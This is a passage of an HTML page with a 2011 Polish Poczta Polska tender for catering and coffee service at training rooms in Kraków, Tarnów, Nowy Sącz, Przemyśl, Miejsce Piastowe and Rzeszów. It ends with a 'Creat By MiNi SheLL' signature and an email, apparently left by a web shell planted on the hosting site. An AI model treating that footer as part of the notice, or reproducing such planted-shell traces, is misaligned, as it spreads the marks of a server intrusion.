<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Podpisany formularz oferty - który należy umieścić jako pierwszą stronę oferty.
2. Wyceniony i podpisany formularz cenowy .
3. Zamawiający żąda, aby Wykonawca do oferty dołączył dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty, tj. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej lub inny dokument potwierdzający powyższe. Wymagane dokumenty można złożyć w formie kopii poświadczonej za zgodność z oryginałem przez wykonawcę.

4. Jeżeli uprawnienie do reprezentacji osoby podpisującej ofertę nie wynika z załączonego dokumentu, o którym mowa w ust. 3, do oferty należy dołączyć także pełnomocnictwo w oryginale  lub w postaci kopii poświadczonej notarialnie za zgodność z oryginałem.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.poczta-polska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poczta Polska S.A. Centrum Infrastruktury Oddział Regionalny w Krakowie ul. Bronowicka 44 pok. 217.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.03.2011 godzina 11:00, miejsce: Poczta Polska S.A. Centrum Infrastruktury Oddział Regionalny w Krakowie ul. Bronowicka 44 pok. 217.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 06.04.2011.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przygotowanie, dostarczenie i podawanie posiłków oraz serwisów kawowych podczas szkoleń organizowanych w salach szkoleniowych PP S.A. na terenie Krakowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	wyżywienie całodniowe składające się ze śniadania, obiadu, kolacji, serwisu kawowego na 1 uczestnika szkolenia - dla maksymalnie 650 osób. 
  	 
b)	serwis kawowy - dla maksymalnie 3676 osób składający się z 
c)	obiad i serwis kawowy  - dla maksymalnie 50 osób
	
Miejsce realizacji usługi na terenie miasta Krakowa: 
- ul. Prokocimska 6 w Krakowie,
- ul. Cystersów 21 w Krakowie,
- ul. Westerplatte 20 w Krakowie,
- ul. Grochowska 2 w Krakowie,
- ul. Lubicz 4 w Krakowie,
- os. Złotej Jesieni 7 w Krakowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przygotowanie i dostarczenie serwisów kawowych podczas szkoleń organizowanych w salach szkoleniowych PP S.A na terenie Tarnowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Serwis kawowy - dla maksymalnie 628 osób składający się z Miejsce realizacji usługi na terenie miasta Tarnowa: 
- ul. Mickiewicza 6 w Tarnowie,
- Pl. Dworcowy 2 w Tarnowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przygotowanie i dostarczenie serwisów kawowych podczas szkoleń organizowanych w salach szkoleniowych PP S.A na terenie Nowego Sącza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Serwis kawowy - dla maksymalnie 408 osób 
Miejsce realizacji usługi na terenie miasta Nowego Sącza: 
	- ul. Dunajewskiego 10 Nowy Sącz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przygotowanie i dostarczenie serwisów kawowych podczas szkoleń organizowanych w salach szkoleniowych PP S.A na terenie Przemyśla.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Serwis kawowy - dla maksymalnie 386 osób 

Miejsce realizacji usługi na terenie miasta Przemyśla: 
- ul. 3 Maja 25 Przemyśl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przygotowanie i dostarczenie serwisów kawowych podczas szkoleń organizowanych w salach szkoleniowych PP S.A na terenie Miejsca Piastowego k/Krosna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Serwis kawowy - dla maksymalnie 531 osób 
Miejsce realizacji usługi - 38-430 Miejsce Piastowe ul. Krośnieńska 5b..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przygotowanie, dostarczenie i podawanie posiłków oraz serwisów kawowych podczas szkoleń organizowanych w salach szkoleniowych PP S.A na terenie  Rzeszowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	wyżywienie całodniowe składające się ze śniadania, obiadu, kolacji, serwisu kawowego na 1 uczestnika szkolenia - dla maksymalnie 108 osób. 
 	 
b)	serwis kawowy - dla maksymalnie 650 osób 
c)	obiad i serwis kawowy - dla maksymalnie 60 osób
	
Miejsce realizacji usługi na terenie miasta Rzeszowa: 
- ul. Asnyka 5 Rzeszów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com